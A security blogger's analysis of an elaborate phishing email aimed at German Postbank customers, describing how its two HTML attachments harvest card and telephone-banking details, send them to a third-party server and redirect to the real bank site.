Extremely complex phishing attack against German Postbank

I don’t write very often about phishing attempts which aren’t international, but this phishing attack against the German Postbank is extremely special and it deserves a through analysis.

I received the phishing email below on one of my private email addresses and it was blocked by the spam filter of the provider. This usually means that the email was sent in a very large amount or it was so badly constructed that it was easy to detect. But, in this case, simple it is not how I would categorize this email.

The email pretends to come from the Data Synchronization Service of Postbank. I have no idea if something like exists, but the main reason of sending the email is to update the PIN of the telephone banking. As in all phishing emails, the fraudsters try to create a sense of emergency by setting a deadline until the banking account is suspended: 7 days after receiving this email. The recipient of the email must click on the link or click on the attachment.

And from this point on start also the problems with this email. They expected that the email clients display a single attachment, an HTML file called start.html. But, the fraudsters didn’t actually see that the recipient sees another attachment, status.html.

This is the output of the status.html:

And this is the output of start.html:

As can be easily seen, the right order is start.html and then status.html. The first one asks for customer details like: name, card number, phone PIN, birth date, birth town. With this information anyone can call Postbank and pretend to be the person submitting the data.

Once authenticated, it is probably possible to perform financial transactions with the accounts registered for the user.

If only with this information it is possible to transfer money, then this is a major problem of Postbank.

Why? A main principle of IT security is broken: Authentication must always be different than Authorization. The data above only authenticate the user, they should not authorize him to perform financial transactions. Authorization must be done in a second step, via SMS (mTAN) or at least a classical TAN. Postbank has already cancelled the concept of TAN last year – they allow only mTAN and other authorization methods.

After the user clicks on the button to submit the data, two things happen:

1. The information are sent to a 3rd party server owned by a Russian citizen (registered in May 2012)

2. The status.html page is shown

3. The browser is redirected to the standard Postbank page.

Very clever, indeed.

Basically, the only link which doesn’t belong to Postbank is the one where the data is submitted.

I am not able to see any syntactic errors, meaning that the pages are copied from the Postbank website.

 

Conclusion

We see here a phishing attack which is extremely well produced.

An usual phishing attack is made following the principle:

1. phishing email with link to the fake website

2. fake website where the information are collected

Most of the time the quality of the both email and website are very bad.

 

This phishing attack contains much more steps:

1. Phishing email with a link to an internal document

This make standard spam filters to not easily detect the fake URL

2. An internet document which contains the form which collects the information

3. All collected information are only silently submitted to a 3rd party website

4. Another local page is displayed after submitting the information

5. The user is redirected to the original website of the brand being attacked.

The quality of the both email and website (web pages in our case) is perfect, probably copied from the original.

 

All users of Internet Security and Avira for Exchange are protected by this attack: all these emails are marked as HIGH level spam.

The phishing attack has been also submitted to the Security Department of Postbank.

 

Sorin Mustaca

Data Security Expert